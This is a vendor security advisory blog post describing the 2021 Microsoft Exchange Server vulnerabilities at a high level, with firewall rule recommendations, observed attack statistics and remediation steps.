Co-authored by Ryan Barnett.
AppSec Protections for Microsoft Exchange CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065
On March 2, 2021, the Microsoft Security Response Center alerted its customers to several critical security updates to Microsoft Exchange Server, addressing vulnerabilities currently under attack.
The United States Computer Emergency Readiness Team Cybersecurity and Infrastructure Security Agency also issued an alert with recommendations on how to mitigate the vulnerabilities.
- CVE-2021-26855 allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via a Server-Side Request Forgery (SSRF). This would also allow the attacker to gain access to mailboxes and read sensitive information.
- CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 allow for remote code execution.
- CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.
- CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server
- To locate a possible compromise of these CVEs, we encourage you to read the Microsoft Advisory.
How Akamai Can Help
Customers that use Akamai Web Application Firewall solutions, Kona Site Defender and Web Application Protector, with the Automated Attack Groups engine have received an automatic update for protection. Akamai recommends that customers using Automated Attack Groups set all their attack groups, but specifically the Web Platform Attack Group, to Deny to prevent these exploitation attempts.
Kona Site Defender customers using Kona Rule Set (KRS) should update their profile and enable newly released rules ID 3000083 and 3000084 in the Total Request Score (Inbound) attack group in order to protect against attempts to exploit the following CVEs:
- CVE-2021-26855, which is the SSRF vulnerability
- CVE-2021-27065, which is being used to upload webshells
Akamai recommends that either the attack group or the individual KRS rules be put into Deny mode to protect against attempts to exploit these vulnerabilities.
Akamai's research and intelligence teams observed that attackers have been quick to automate their target identification and exploitation attempts. A variety of existing controls in Akamai's security portfolio are designed to detect these attempts:
- Web Application Firewall -- Rate Controls, TOR IP Blocklist, and Penalty Box are all also detecting and blocking this scanning traffic
- Client Reputation -- the "Web Scanner" and "Web Attacker" categories are identifying many attackers searching for vulnerable targets
- Bot Management -- controls detect the incoming traffic to be automated or from anonymous proxies
If you have any questions, please reach out to Akamai Support Services or your account team.
Global Attack Intelligence
Over the last 48 hours on our global platform we have observed:
- 290,000 unique attempts to scan and/or exploit these vulnerabilities
- 952 unique IPs involved in these attempts
- 731 of these unique IPs were identified by Akamai Client Reputation threat intelligence as known web scanners or web attackers with a median score of 9.6 out of 10
- 23,910 unique hosts targeted
- 80% of attack activity targeted against Commerce, High-Tech, Financial Services, and Manufacturing verticals
- 90% of all attack attempts targeted against organizations in the United States, Austria, India, Canada, Germany, France and the United Kingdom
- Assetnote and Qualys were the top two known scanners
Conclusion and Recommended Steps
We've confirmed active attempts of exploitation of Microsoft Exchange/Outlook Web Access zero-day vulnerabilities.
Successful exploitation allows an unauthenticated attacker to execute arbitrary code and install webshells on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system.
Mitigation and remediation can be achieved by following these steps:
- Akamai customers that have Exchange/Outlook Web Access protected by either Kona Site Defender using the Automated Attack Groups rule set or the Web Application Protector product have already received an automatic update to the Platform Attacks Group. Kona Site Defender customers that are using the Kona Rule Set, however, need to take steps to activate the new rules to receive protection.
- Customers should also deploy updates to affected Exchange Servers as recommended by Microsoft and enable the Akamai protections as recommended above.
- Customers should investigate for exploitation or indicators of persistence.
- Customers should remediate any identified exploitation or persistence and investigate their environment for indicators of lateral movement or further compromise.
Companies should consider implementing Zero Trust Network Access (ZTNA) to be able to weather software vulnerabilities like these. Unlike the traditional "verify, then trust" model -- which means if someone has the correct user credentials, they are admitted to whichever site, app, or device they are requesting -- ZTNA dictates that users and devices are never trusted and can only access applications and data after passing a secure authentication and authorization process that does not solely rely on user credentials. You can read more about how ZTNA can protect corporate resources in the context of these Microsoft Exchange vulnerabilities in the blog post, Microsoft Exchange and Verkada Hacks: Isolate Your Apps & APIs from the Internet Cesspool: Isolate Your Apps and APIs from the Internet Cesspool.